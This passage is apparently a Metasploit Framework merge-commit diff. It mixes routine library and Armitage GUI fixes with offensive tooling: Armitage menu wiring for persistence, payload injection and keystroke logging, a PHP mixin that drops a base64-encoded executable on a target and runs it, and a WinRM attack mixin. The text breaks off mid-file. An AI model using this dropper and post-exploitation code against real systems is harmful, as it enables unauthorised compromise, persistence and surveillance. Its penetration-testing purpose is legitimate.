Merge branch 'master' into bug/wrong-file_changed-argument
Conflicts: lib/msf/core/modules/loader/base.rbunstable
commit
055f95898d
2
Rakefile
2
Rakefile
|
@ -37,7 +37,7 @@ namespace :yard do
|
|||
task :stats => :environment do
|
||||
stats = YARD::CLI::Stats.new
|
||||
yard_arguments = yard_options + ['--compact', '--list-undoc'] + yard_files
|
||||
stats.run *yard_arguments
|
||||
stats.run(*yard_arguments)
|
||||
end
|
||||
end
|
||||
|
||||
|
|
Binary file not shown.
Binary file not shown.
|
@ -1,6 +1,23 @@
|
|||
Armitage Changelog
|
||||
==================
|
||||
|
||||
16 Oct 12 (tested against msf 15972)
|
||||
---------
|
||||
- Added port 5985 to MSF Scans list.
|
||||
- Meterpreter -> Access -> Persistence sets ACTION option for you
|
||||
- Changed how LHOST and LPORT are set globally to prevent Ruby
|
||||
character encoding conversion error in the framework.
|
||||
- Pass Session, Log Keystrokes, and Persist now query module info
|
||||
in a separate thread (avoids a deadlock opportunity)
|
||||
- Armitage now shows folder/URL in a popup dialog for environments
|
||||
where JDesktop API to open them directly is not supported
|
||||
- Check all credentials option now filters the list to avoid trying
|
||||
a pair of credentials twice.
|
||||
- Armitage's exploit payload selection now selects cmd/unix/interact
|
||||
when appropriate.
|
||||
- Explore -> Processes now works with Java Meterpreter again.
|
||||
- MSF Scans feature now runs http_version against port 443
|
||||
|
||||
5 Sept 12 (tested against msf r15804)
|
||||
---------
|
||||
- Setup dialog now trims host, port, user, and pass fields.
|
||||
|
|
|
@ -0,0 +1,2 @@
|
|||
source "http://rubygems.org"
|
||||
gemspec
|
|
@ -1,7 +1,8 @@
|
|||
Kiss FFT library
|
||||
==================
|
||||
|
||||
Copyright (c) 2003-2006 Mark Borgerding
|
||||
|
||||
Copyright (c) 2003-2010 Mark Borgerding
|
||||
|
||||
All rights reserved.
|
||||
|
||||
|
@ -13,11 +14,10 @@ Redistribution and use in source and binary forms, with or without modification,
|
|||
|
||||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
||||
|
||||
|
||||
Ruby wrapper layer
|
||||
==================
|
||||
|
||||
Copyright (C) 2009 H D Moore
|
||||
Copyright (C) 2009-2012 H D Moore < hdm[at]rapid7.com >
|
||||
|
||||
All rights reserved.
|
||||
|
|
@ -0,0 +1 @@
|
|||
require "bundler/gem_tasks"
|
|
@ -1,5 +1,5 @@
|
|||
/*
|
||||
Copyright (c) 2003-2004, Mark Borgerding
|
||||
Copyright (c) 2003-2010, Mark Borgerding
|
||||
|
||||
All rights reserved.
|
||||
|
||||
|
@ -148,3 +148,17 @@ struct kiss_fft_state{
|
|||
/* a debugging function */
|
||||
#define pcpx(c)\
|
||||
fprintf(stderr,"%g + %gi\n",(double)((c)->r),(double)((c)->i) )
|
||||
|
||||
|
||||
#ifdef KISS_FFT_USE_ALLOCA
|
||||
// define this to allow use of alloca instead of malloc for temporary buffers
|
||||
// Temporary buffers are used in two case:
|
||||
// 1. FFT sizes that have "bad" factors. i.e. not 2,3 and 5
|
||||
// 2. "in-place" FFTs. Notice the quotes, since kissfft does not really do an in-place transform.
|
||||
#include <alloca.h>
|
||||
#define KISS_FFT_TMP_ALLOC(nbytes) alloca(nbytes)
|
||||
#define KISS_FFT_TMP_FREE(ptr)
|
||||
#else
|
||||
#define KISS_FFT_TMP_ALLOC(nbytes) KISS_FFT_MALLOC(nbytes)
|
||||
#define KISS_FFT_TMP_FREE(ptr) KISS_FFT_FREE(ptr)
|
||||
#endif
|
|
@ -1,5 +1,5 @@
|
|||
/*
|
||||
Copyright (c) 2003-2004, Mark Borgerding
|
||||
Copyright (c) 2003-2010, Mark Borgerding
|
||||
|
||||
All rights reserved.
|
||||
|
||||
|
@ -18,21 +18,6 @@ THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
|
|||
fixed or floating point complex numbers. It also delares the kf_ internal functions.
|
||||
*/
|
||||
|
||||
static kiss_fft_cpx *scratchbuf=NULL;
|
||||
static size_t nscratchbuf=0;
|
||||
static kiss_fft_cpx *tmpbuf=NULL;
|
||||
static size_t ntmpbuf=0;
|
||||
|
||||
#define CHECKBUF(buf,nbuf,n) \
|
||||
do { \
|
||||
if ( nbuf < (size_t)(n) ) {\
|
||||
free(buf); \
|
||||
buf = (kiss_fft_cpx*)KISS_FFT_MALLOC(sizeof(kiss_fft_cpx)*(n)); \
|
||||
nbuf = (size_t)(n); \
|
||||
} \
|
||||
}while(0)
|
||||
|
||||
|
||||
static void kf_bfly2(
|
||||
kiss_fft_cpx * Fout,
|
||||
const size_t fstride,
|
||||
|
@ -69,6 +54,7 @@ static void kf_bfly4(
|
|||
const size_t m2=2*m;
|
||||
const size_t m3=3*m;
|
||||
|
||||
|
||||
tw3 = tw2 = tw1 = st->twiddles;
|
||||
|
||||
do {
|
||||
|
@ -222,29 +208,30 @@ static void kf_bfly_generic(
|
|||
kiss_fft_cpx t;
|
||||
int Norig = st->nfft;
|
||||
|
||||
CHECKBUF(scratchbuf,nscratchbuf,p);
|
||||
kiss_fft_cpx * scratch = (kiss_fft_cpx*)KISS_FFT_TMP_ALLOC(sizeof(kiss_fft_cpx)*p);
|
||||
|
||||
for ( u=0; u<m; ++u ) {
|
||||
k=u;
|
||||
for ( q1=0 ; q1<p ; ++q1 ) {
|
||||
scratchbuf[q1] = Fout[ k ];
|
||||
C_FIXDIV(scratchbuf[q1],p);
|
||||
scratch[q1] = Fout[ k ];
|
||||
C_FIXDIV(scratch[q1],p);
|
||||
k += m;
|
||||
}
|
||||
|
||||
k=u;
|
||||
for ( q1=0 ; q1<p ; ++q1 ) {
|
||||
int twidx=0;
|
||||
Fout[ k ] = scratchbuf[0];
|
||||
Fout[ k ] = scratch[0];
|
||||
for (q=1;q<p;++q ) {
|
||||
twidx += fstride * k;
|
||||
if (twidx>=Norig) twidx-=Norig;
|
||||
C_MUL(t,scratchbuf[q] , twiddles[twidx] );
|
||||
C_MUL(t,scratch[q] , twiddles[twidx] );
|
||||
C_ADDTO( Fout[ k ] ,t);
|
||||
}
|
||||
k += m;
|
||||
}
|
||||
}
|
||||
KISS_FFT_TMP_FREE(scratch);
|
||||
}
|
||||
|
||||
static
|
||||
|
@ -265,7 +252,8 @@ void kf_work(
|
|||
#ifdef _OPENMP
|
||||
// use openmp extensions at the
|
||||
// top-level (not recursive)
|
||||
if (fstride==1) {
|
||||
if (fstride==1 && p<=5)
|
||||
{
|
||||
int k;
|
||||
|
||||
// execute the p different work units in different threads
|
||||
|
@ -380,14 +368,15 @@ kiss_fft_cfg kiss_fft_alloc(int nfft,int inverse_fft,void * mem,size_t * lenmem
|
|||
}
|
||||
|
||||
|
||||
|
||||
|
||||
void kiss_fft_stride(kiss_fft_cfg st,const kiss_fft_cpx *fin,kiss_fft_cpx *fout,int in_stride)
|
||||
{
|
||||
if (fin == fout) {
|
||||
CHECKBUF(tmpbuf,ntmpbuf,st->nfft);
|
||||
//NOTE: this is not really an in-place FFT algorithm.
|
||||
//It just performs an out-of-place FFT into a temp buffer
|
||||
kiss_fft_cpx * tmpbuf = (kiss_fft_cpx*)KISS_FFT_TMP_ALLOC( sizeof(kiss_fft_cpx)*st->nfft);
|
||||
kf_work(tmpbuf,fin,1,in_stride, st->factors,st);
|
||||
memcpy(fout,tmpbuf,sizeof(kiss_fft_cpx)*st->nfft);
|
||||
KISS_FFT_TMP_FREE(tmpbuf);
|
||||
}else{
|
||||
kf_work( fout, fin, 1,in_stride, st->factors,st );
|
||||
}
|
||||
|
@ -399,17 +388,9 @@ void kiss_fft(kiss_fft_cfg cfg,const kiss_fft_cpx *fin,kiss_fft_cpx *fout)
|
|||
}
|
||||
|
||||
|
||||
/* not really necessary to call, but if someone is doing in-place ffts, they may want to free the
|
||||
buffers from CHECKBUF
|
||||
*/
|
||||
void kiss_fft_cleanup(void)
|
||||
{
|
||||
free(scratchbuf);
|
||||
scratchbuf = NULL;
|
||||
nscratchbuf=0;
|
||||
free(tmpbuf);
|
||||
tmpbuf=NULL;
|
||||
ntmpbuf=0;
|
||||
// nothing needed any more
|
||||
}
|
||||
|
||||
int kiss_fft_next_fast_size(int n)
|
|
@ -5,7 +5,6 @@
|
|||
#include <stdio.h>
|
||||
#include <math.h>
|
||||
#include <string.h>
|
||||
#include <malloc.h>
|
||||
|
||||
#ifdef __cplusplus
|
||||
extern "C" {
|
||||
|
@ -27,9 +26,11 @@ extern "C" {
|
|||
#ifdef USE_SIMD
|
||||
# include <xmmintrin.h>
|
||||
# define kiss_fft_scalar __m128
|
||||
#define KISS_FFT_MALLOC(nbytes) memalign(16,nbytes)
|
||||
#define KISS_FFT_MALLOC(nbytes) _mm_malloc(nbytes,16)
|
||||
#define KISS_FFT_FREE _mm_free
|
||||
#else
|
||||
#define KISS_FFT_MALLOC malloc
|
||||
#define KISS_FFT_FREE free
|
||||
#endif
|
||||
|
||||
|
|
@ -19,9 +19,9 @@ struct kiss_fftr_state{
|
|||
kiss_fft_cfg substate;
|
||||
kiss_fft_cpx * tmpbuf;
|
||||
kiss_fft_cpx * super_twiddles;
|
||||
#ifdef USE_SIMD
|
||||
long pad;
|
||||
#endif
|
||||
#ifdef USE_SIMD
|
||||
void * pad;
|
||||
#endif
|
||||
};
|
||||
|
||||
kiss_fftr_cfg kiss_fftr_alloc(int nfft,int inverse_fft,void * mem,size_t * lenmem)
|
|
@ -0,0 +1,16 @@
|
|||
# -*- encoding: utf-8 -*-
|
||||
|
||||
Gem::Specification.new do |s|
|
||||
s.name = "kissfft"
|
||||
s.version = "0.0.1"
|
||||
s.authors = ["HD Moore"]
|
||||
s.email = ["hdm@rapid7.com"]
|
||||
s.homepage = ""
|
||||
s.summary = %q{Ruby wrapper around the KisFFT library for performing FFTs}
|
||||
s.description = %q{Provides access to the KissFFT library for performing fast-fourier transforms from Ruby }
|
||||
|
||||
s.files = Dir.glob('lib/**/*.rb') + Dir.glob('ext/**/*.{c,h,rb}') + [ "LICENSE" ]
|
||||
s.test_files = Dir.glob('test/**/*.{rb,data}')
|
||||
s.extensions = [ 'ext/kissfft/extconf.rb' ]
|
||||
s.require_paths = ["lib"]
|
||||
end
|
|
@ -3,7 +3,7 @@
|
|||
<center><h1>Armitage 1.44</h1></center>
|
||||
|
||||
<p>An attack management tool for Metasploit®
|
||||
<br />Release: 5 Sept 12</p>
|
||||
<br />Release: 16 Oct 12</p>
|
||||
<br />
|
||||
<p>Developed by:</p>
|
||||
|
||||
|
|
|
@ -349,6 +349,9 @@ sub best_payload {
|
|||
else if ("java/jsp_shell_bind_tcp" in $compatible) {
|
||||
return "java/jsp_shell_bind_tcp";
|
||||
}
|
||||
else if ("cmd/unix/interact" in $compatible) {
|
||||
return "cmd/unix/interact";
|
||||
}
|
||||
else {
|
||||
return "generic/shell_bind_tcp";
|
||||
}
|
||||
|
|
|
@ -475,7 +475,12 @@ sub gotoFile {
|
|||
return lambda({
|
||||
local('$exception');
|
||||
try {
|
||||
[[Desktop getDesktop] open: $f];
|
||||
if ([Desktop isDesktopSupported]) {
|
||||
[[Desktop getDesktop] open: $f];
|
||||
}
|
||||
else {
|
||||
ask("Browse to this file:", $f);
|
||||
}
|
||||
}
|
||||
catch $exception {
|
||||
showError("Could not open $f $+ \n $+ $exception");
|
||||
|
|
|
@ -356,6 +356,16 @@ sub _launch_dialog {
|
|||
if (!isShift($1)) {
|
||||
[$dialog setVisible: 0];
|
||||
}
|
||||
|
||||
# fix some module options...
|
||||
if ($command eq "windows/manage/persistence") {
|
||||
if ('REXE' in $options) {
|
||||
$options['ACTION'] = 'REXE';
|
||||
}
|
||||
else {
|
||||
$options['ACTION'] = 'TEMPLATE';
|
||||
}
|
||||
}
|
||||
|
||||
# it's go time buddy... time to filter some stuff...
|
||||
($type, $command, $options) = filter_data("user_launch", $type, $command, $options);
|
||||
|
|
|
@ -188,7 +188,12 @@ sub main_attack_items {
|
|||
|
||||
sub gotoURL {
|
||||
return lambda({
|
||||
[[Desktop getDesktop] browse: $url];
|
||||
if ([Desktop isDesktopSupported]) {
|
||||
[[Desktop getDesktop] browse: $url];
|
||||
}
|
||||
else {
|
||||
ask("Browse to this URL:", $url);
|
||||
}
|
||||
}, $url => [[new URL: $1] toURI]);
|
||||
}
|
||||
|
||||
|
|
|
@ -191,11 +191,15 @@ sub showMeterpreterMenu {
|
|||
}, $sid => "$sid"));
|
||||
|
||||
item($j, "Persist", 'P', lambda({
|
||||
launch_dialog("Persistence", "post", "windows/manage/persistence", 1, $null, %(SESSION => $sid, LPORT => %MSF_GLOBAL['LPORT'], HANDLER => "0"));
|
||||
thread(lambda({
|
||||
launch_dialog("Persistence", "post", "windows/manage/persistence", 1, $null, %(SESSION => $sid, LPORT => %MSF_GLOBAL['LPORT'], HANDLER => "0"));
|
||||
}, \$sid));
|
||||
}, $sid => "$sid"));
|
||||
|
||||
item($j, "Pass Session", 'S', lambda({
|
||||
launch_dialog("Pass Session", "post", "windows/manage/payload_inject", 1, $null, %(SESSION => $sid, LPORT => %MSF_GLOBAL['LPORT'], HANDLER => "0"));
|
||||
thread(lambda({
|
||||
launch_dialog("Pass Session", "post", "windows/manage/payload_inject", 1, $null, %(SESSION => $sid, LPORT => %MSF_GLOBAL['LPORT'], HANDLER => "0"));
|
||||
}, \$sid));
|
||||
}, $sid => "$sid"));
|
||||
|
||||
setupMenu($j, "meterpreter_access", @($sid));
|
||||
|
@ -241,7 +245,9 @@ sub showMeterpreterMenu {
|
|||
item($j, "Show Processes", 'P', lambda({ createProcessBrowser($sid); }, $sid => "$sid"));
|
||||
if ("*win*" iswm $platform) {
|
||||
item($j, "Log Keystrokes", 'K', lambda({
|
||||
launch_dialog("Log Keystrokes", "post", "windows/capture/keylog_recorder", 1, $null, %(SESSION => $sid, MIGRATE => 1, ShowKeystrokes => 1));
|
||||
thread(lambda({
|
||||
launch_dialog("Log Keystrokes", "post", "windows/capture/keylog_recorder", 1, $null, %(SESSION => $sid, MIGRATE => 1, ShowKeystrokes => 1));
|
||||
}, \$sid));
|
||||
}, $sid => "$sid"));
|
||||
}
|
||||
|
||||
|
@ -305,6 +311,9 @@ sub launch_msf_scans {
|
|||
if ('RPORT' in %o) {
|
||||
$port = %o['RPORT']['default'];
|
||||
push(%ports[$port], $scanner);
|
||||
if ($port == 80) {
|
||||
push(%ports['443'], $scanner);
|
||||
}
|
||||
}
|
||||
|
||||
safetyCheck();
|
||||
|
@ -313,7 +322,7 @@ sub launch_msf_scans {
|
|||
|
||||
# add these ports to our list of ports to scan.. these come from querying all of Metasploit's modules
|
||||
# for the default ports
|
||||
foreach $port (@(50000, 21, 1720, 80, 443, 143, 3306, 1521, 110, 5432, 50013, 25, 161, 22, 23, 17185, 135, 8080, 4848, 1433, 5560, 512, 513, 514, 445, 5900, 5038, 111, 139, 49, 515, 7787, 2947, 7144, 9080, 8812, 2525, 2207, 3050, 5405, 1723, 1099, 5555, 921, 10001, 123, 3690, 548, 617, 6112, 6667, 3632, 783, 10050, 38292, 12174, 2967, 5168, 3628, 7777, 6101, 10000, 6504, 41523, 41524, 2000, 1900, 10202, 6503, 6070, 6502, 6050, 2103, 41025, 44334, 2100, 5554, 12203, 26000, 4000, 1000, 8014, 5250, 34443, 8028, 8008, 7510, 9495, 1581, 8000, 18881, 57772, 9090, 9999, 81, 3000, 8300, 8800, 8090, 389, 10203, 5093, 1533, 13500, 705, 623, 4659, 20031, 16102, 6080, 6660, 11000, 19810, 3057, 6905, 1100, 10616, 10628, 5051, 1582, 65535, 105, 22222, 30000, 113, 1755, 407, 1434, 2049, 689, 3128, 20222, 20034, 7580, 7579, 38080, 12401, 910, 912, 11234, 46823, 5061, 5060, 2380, 69, 5800, 62514, 42, 5631, 902)) {
|
||||
foreach $port (@(50000, 21, 1720, 80, 443, 143, 3306, 1521, 110, 5432, 50013, 25, 161, 22, 23, 17185, 135, 8080, 4848, 1433, 5560, 512, 513, 514, 445, 5900, 5038, 111, 139, 49, 515, 7787, 2947, 7144, 9080, 8812, 2525, 2207, 3050, 5405, 1723, 1099, 5555, 921, 10001, 123, 3690, 548, 617, 6112, 6667, 3632, 783, 10050, 38292, 12174, 2967, 5168, 3628, 7777, 6101, 10000, 6504, 41523, 41524, 2000, 1900, 10202, 6503, 6070, 6502, 6050, 2103, 41025, 44334, 2100, 5554, 12203, 26000, 4000, 1000, 8014, 5250, 34443, 8028, 8008, 7510, 9495, 1581, 8000, 18881, 57772, 9090, 9999, 81, 3000, 8300, 8800, 8090, 389, 10203, 5093, 1533, 13500, 705, 623, 4659, 20031, 16102, 6080, 6660, 11000, 19810, 3057, 6905, 1100, 10616, 10628, 5051, 1582, 65535, 105, 22222, 30000, 113, 1755, 407, 1434, 2049, 689, 3128, 20222, 20034, 7580, 7579, 38080, 12401, 910, 912, 11234, 46823, 5061, 5060, 2380, 69, 5800, 62514, 42, 5631, 902, 5985)) {
|
||||
$temp = %ports[$port];
|
||||
}
|
||||
|
||||
|
@ -343,7 +352,12 @@ sub launch_msf_scans {
|
|||
if ($port in %ports) {
|
||||
$modules = %ports[$port];
|
||||
foreach $module ($modules) {
|
||||
push(@launch, @($module, %(RHOSTS => join(", ", $hosts), RPORT => $port, THREADS => 24)));
|
||||
if ($port == 443) {
|
||||
push(@launch, @($module, %(RHOSTS => join(", ", $hosts), RPORT => $port, THREADS => 24, SSL => "1")));
|
||||
}
|
||||
else {
|
||||
push(@launch, @($module, %(RHOSTS => join(", ", $hosts), RPORT => $port, THREADS => 24)));
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
|
@ -297,19 +297,24 @@ sub show_login_dialog {
|
|||
}
|
||||
|
||||
sub createUserPassFile {
|
||||
local('$handle $user $pass $type $row $2 $name');
|
||||
local('$handle $user $pass $type $row $2 $name %entries');
|
||||
$name = "userpass" . rand(10000) . ".txt";
|
||||
|
||||
$handle = openf("> $+ $name");
|
||||
# loop through our entries and store them
|
||||
%entries = ohash();
|
||||
foreach $row ($1) {
|
||||
($user, $pass, $type) = values($row, @("user", "pass", "ptype"));
|
||||
if ($type eq "password" || $type eq $2) {
|
||||
println($handle, "$user $pass");
|
||||
%entries["$user $pass"] = "$user $pass";
|
||||
}
|
||||
else {
|
||||
println($handle, "$user");
|
||||
%entries[$user] = $user;
|
||||
}
|
||||
}
|
||||
|
||||
# print out unique entry values
|
||||
$handle = openf("> $+ $name");
|
||||
printAll($handle, values(%entries));
|
||||
closef($handle);
|
||||
|
||||
if ($client !is $mclient) {
|
||||
|
|
|
@ -27,6 +27,12 @@ sub parseProcessList {
|
|||
# REMOVEME--this is a backwards compatability hack.
|
||||
@rows = parseTextTable($2, @("PID", "Name", "Arch", "Session", "User", "Path"));
|
||||
}
|
||||
|
||||
# this is the format for Java meterpreter
|
||||
if (size(@rows) == 0) {
|
||||
@rows = parseTextTable($2, @("PID", "Name", "Arch", "User", "Path"));
|
||||
}
|
||||
|
||||
foreach $row (@rows) {
|
||||
[%processes[$1] addEntry: $row];
|
||||
}
|
||||
|
|
|
@ -355,7 +355,7 @@ sub client {
|
|||
|
||||
sub main {
|
||||
global('$client $mclient');
|
||||
local('$server %sessions $sess_lock $read_lock $poll_lock $lock_lock %locks %readq $id @events $error $auth %cache $cach_lock $client_cache $handle');
|
||||
local('$server %sessions $sess_lock $read_lock $poll_lock $lock_lock %locks %readq $id @events $error $auth %cache $cach_lock $client_cache $handle $console');
|
||||
|
||||
$auth = unpack("H*", digest(rand() . ticks(), "MD5"))[0];
|
||||
|
||||
|
@ -400,9 +400,6 @@ sub main {
|
|||
$mclient = $client;
|
||||
initConsolePool(); # this needs to happen... right now.
|
||||
|
||||
# set the LHOST to whatever the user specified
|
||||
call_async($client, "core.setg", "LHOST", $host);
|
||||
|
||||
# we need this global to be set so our reverse listeners work as expected.
|
||||
$MY_ADDRESS = $host;
|
||||
|
||||
|
@ -423,6 +420,13 @@ sub main {
|
|||
$lock_lock = semaphore(1);
|
||||
$cach_lock = semaphore(1);
|
||||
|
||||
# set the LHOST to whatever the user specified (use console.write to make the string not UTF-8)
|
||||
$console = createConsole($client);
|
||||
call($client, "console.write", $console, "setg LHOST $host $+ \n");
|
||||
sleep(2000);
|
||||
# absorb the output of this command which is LHOST => ...
|
||||
call($client, "console.read", $console);
|
||||
|
||||
#
|
||||
# create a thread to push console messages to the event queue for all clients.
|
||||
#
|
||||
|
@ -437,7 +441,7 @@ sub main {
|
|||
release($poll_lock);
|
||||
}
|
||||
}
|
||||
}, \$client, \$poll_lock, \@events, $console => createConsole($client));
|
||||
}, \$client, \$poll_lock, \@events, \$console);
|
||||
|
||||
#
|
||||
# Create a shared hash that contains a thread for each session...
|
||||
|
|
|
@ -152,7 +152,10 @@ sub createConsoleTab {
|
|||
|
||||
sub setg {
|
||||
%MSF_GLOBAL[$1] = $2;
|
||||
call_async($client, "core.setg", $1, $2);
|
||||
local('$c');
|
||||
$c = createConsole($client);
|
||||
call_async($client, "console.write", $c, "setg $1 $2 $+ \n");
|
||||
call_async($client, "console.release", $c);
|
||||
}
|
||||
|
||||
sub createDefaultHandler {
|
||||
|
|
|
@ -104,6 +104,9 @@ public class ConsoleClient implements Runnable, ActionListener {
|
|||
if (destroyCommand != null) {
|
||||
((RpcAsync)connection).execute_async(destroyCommand, new Object[] { session });
|
||||
}
|
||||
|
||||
/* we don't need to keep reading from this console */
|
||||
kill();
|
||||
}
|
||||
|
||||
protected void finalize() {
|
||||
|
|
|
@ -1,6 +1,23 @@
|
|||
Armitage Changelog
|
||||
==================
|
||||
|
||||
16 Oct 12 (tested against msf 15972)
|
||||
---------
|
||||
- Added port 5985 to MSF Scans list.
|
||||
- Meterpreter -> Access -> Persistence sets ACTION option for you
|
||||
- Changed how LHOST and LPORT are set globally to prevent Ruby
|
||||
character encoding conversion error in the framework.
|
||||
- Pass Session, Log Keystrokes, and Persist now query module info
|
||||
in a separate thread (avoids a deadlock opportunity)
|
||||
- Armitage now shows folder/URL in a popup dialog for environments
|
||||
where JDesktop API to open them directly is not supported
|
||||
- Check all credentials option now filters the list to avoid trying
|
||||
a pair of credentials twice.
|
||||
- Armitage's exploit payload selection now selects cmd/unix/interact
|
||||
when appropriate.
|
||||
- Explore -> Processes now works with Java Meterpreter again.
|
||||
- MSF Scans feature now runs http_version against port 443
|
||||
|
||||
5 Sept 12 (tested against msf r15804)
|
||||
---------
|
||||
- Setup dialog now trims host, port, user, and pass fields.
|
||||
|
|
|
@ -80,6 +80,12 @@ module Exploit::Remote::HttpServer
|
|||
def print_debug(msg='')
|
||||
(cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
|
||||
end
|
||||
#
|
||||
# :category: print_* overrides
|
||||
# Prepends client and module name if inside a thread with a #cli
|
||||
def print_warning(msg='')
|
||||
(cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
|
||||
end
|
||||
|
||||
# :category: print_* overrides
|
||||
# Prepends client and module name if inside a thread with a #cli
|
||||
|
@ -101,6 +107,11 @@ module Exploit::Remote::HttpServer
|
|||
def vprint_debug(msg='')
|
||||
(cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
|
||||
end
|
||||
# :category: print_* overrides
|
||||
# Prepends client and module name if inside a thread with a #cli
|
||||
def vprint_warning(msg='')
|
||||
(cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
|
|
|
@ -88,3 +88,6 @@ require 'msf/core/exploit/java'
|
|||
# WBEM
|
||||
require 'msf/core/exploit/wbemexec'
|
||||
|
||||
#WinRM
|
||||
require 'msf/core/exploit/winrm'
|
||||
|
||||
|
|
|
@ -0,0 +1,88 @@
|
|||
# -*- coding: binary -*-
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
###
|
||||
#
|
||||
# This module exposes a simple method to create an payload in an executable.
|
||||
#
|
||||
###
|
||||
|
||||
require 'msf/core/payload/php'
|
||||
|
||||
module Msf
|
||||
module Exploit::PhpEXE
|
||||
include Exploit::EXE
|
||||
include Payload::Php
|
||||
|
||||
#
|
||||
# Generate a first-stage php payload.
|
||||
#
|
||||
# For ARCH_PHP targets, simply returns payload.encoded wrapped in <?php ?>
|
||||
# markers.
|
||||
#
|
||||
# For target architectures other than ARCH_PHP, this will base64 encode an
|
||||
# appropriate executable and drop it on the target system. After running
|
||||
# it, the generated code will attempt to unlink the dropped executable which
|
||||
# will certainly fail on Windows.
|
||||
#
|
||||
# @option opts [String] :writable_path A path on the victim where we can
|
||||
# write an executable. Uses current directory if not given.
|
||||
# @option opts [Boolean] :unlink_self Whether to call unlink(__FILE__); in
|
||||
# the payload. Good idea for arbitrary-file-upload vulns, bad idea for
|
||||
# write-to-a-config-file vulns
|
||||
#
|
||||
# @return [String] A PHP payload that will drop an executable for non-php
|
||||
# target architectures
|
||||
#
|
||||
# @todo Test on Windows
|
||||
def get_write_exec_payload(opts={})
|
||||
case target_arch.first
|
||||
when ARCH_PHP
|
||||
php = payload.encoded
|
||||
else
|
||||
bin_name = Rex::Text.rand_text_alpha(8)
|
||||
if opts[:writable_path]
|
||||
bin_name = [opts[:writable_path], bin_name].join("/")
|
||||
else
|
||||
bin_name = "./#{bin_name}"
|
||||
end
|
||||
if target["Platform"] == 'win'
|
||||
bin_name << ".exe"
|
||||
print_debug("Unable to clean up #{bin_name}, delete it manually")
|
||||
end
|
||||
p = Rex::Text.encode_base64(generate_payload_exe)
|
||||
php = %Q{
|
||||
error_reporting(0);
|
||||
$ex = "#{bin_name}";
|
||||
$f = fopen($ex, "wb");
|
||||
fwrite($f, base64_decode("#{p}"));
|
||||
fclose($f);
|
||||
chmod($ex, 0777);
|
||||
function my_cmd($cmd) {
|
||||
#{php_preamble}
|
||||
#{php_system_block};
|
||||
}
|
||||
if (FALSE === strpos(strtolower(PHP_OS), 'win' )) {
|
||||
my_cmd($ex . "&");
|
||||
} else {
|
||||
my_cmd($ex);
|
||||
}
|
||||
unlink($ex);
|
||||
}
|
||||
end
|
||||
|
||||
if opts[:unlink_self]
|
||||
php << "unlink(__FILE__);"
|
||||
end
|
||||
|
||||
php.gsub!(/#.*$/, '')
|
||||
php.gsub!(/[\t ]+/, ' ')
|
||||
php.gsub!(/\n/, ' ')
|
||||
return "<?php #{php} ?>"
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
end
|
|
@ -0,0 +1,471 @@
|
|||
# -*- coding: binary -*-
|
||||
require 'uri'
|
||||
require 'digest'
|
||||
require 'rex/proto/ntlm/crypt'
|
||||
require 'rex/proto/ntlm/constants'
|
||||
require 'rex/proto/ntlm/utils'
|
||||
require 'rex/proto/ntlm/exceptions'
|
||||
|
||||
module Msf
|
||||
module Exploit::Remote::WinRM
|
||||
|
||||
include Exploit::Remote::NTLM::Client
|
||||
include Exploit::Remote::HttpClient
|
||||
|
||||
#
|
||||
# Constants
|
||||
#
|
||||
NTLM_CRYPT ||= Rex::Proto::NTLM::Crypt
|
||||
NTLM_CONST ||= Rex::Proto::NTLM::Constants
|
||||
NTLM_UTILS ||= Rex::Proto::NTLM::Utils
|
||||
NTLM_XCEPT ||= Rex::Proto::NTLM::Exceptions
|
||||
|
||||
def initialize(info = {})
|
||||
super
|
||||
register_options(
|
||||
[
|
||||
Opt::RHOST,
|
||||
Opt::RPORT(5985),
|
||||
OptString.new('VHOST', [ false, "HTTP server virtual host" ]),
|
||||
OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false]),
|
||||
OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'SSL3', ['SSL2', 'SSL3', 'TLS1']]),
|
||||
OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentification', 'WORKSTATION']),
|
||||
OptString.new('URI', [ true, "The URI of the WinRM service", "/wsman" ]),
|
||||
OptString.new('USERNAME', [ false, 'A specific username to authenticate as' ]),
|
||||
OptString.new('PASSWORD', [ false, 'A specific password to authenticate with' ])
|
||||
], self.class
|
||||
)
|
||||
|
||||
register_autofilter_ports([ 80,443,5985,5986 ])
|
||||
register_autofilter_services(%W{ winrm })
|
||||
end
|
||||
|
||||
def winrm_poke(timeout = 20)
|
||||
opts = {
|
||||
'uri' => datastore['URI'],
|
||||
'data' => Rex::Text.rand_text_alpha(8)
|
||||
}
|
||||
|
||||
c = connect(opts)
|
||||
to = opts[:timeout] || timeout
|
||||
ctype = "application/soap+xml;charset=UTF-8"
|
||||
|
||||
resp, c = send_request_cgi(opts.merge({
|
||||
'uri' => opts['uri'],
|
||||
'method' => 'POST',
|
||||
'ctype' => ctype,
|
||||
'data' => opts['data']
|
||||
}), to)
|
||||
|
||||
return resp
|
||||
end
|
||||
|
||||
def parse_auth_methods(resp)
|
||||
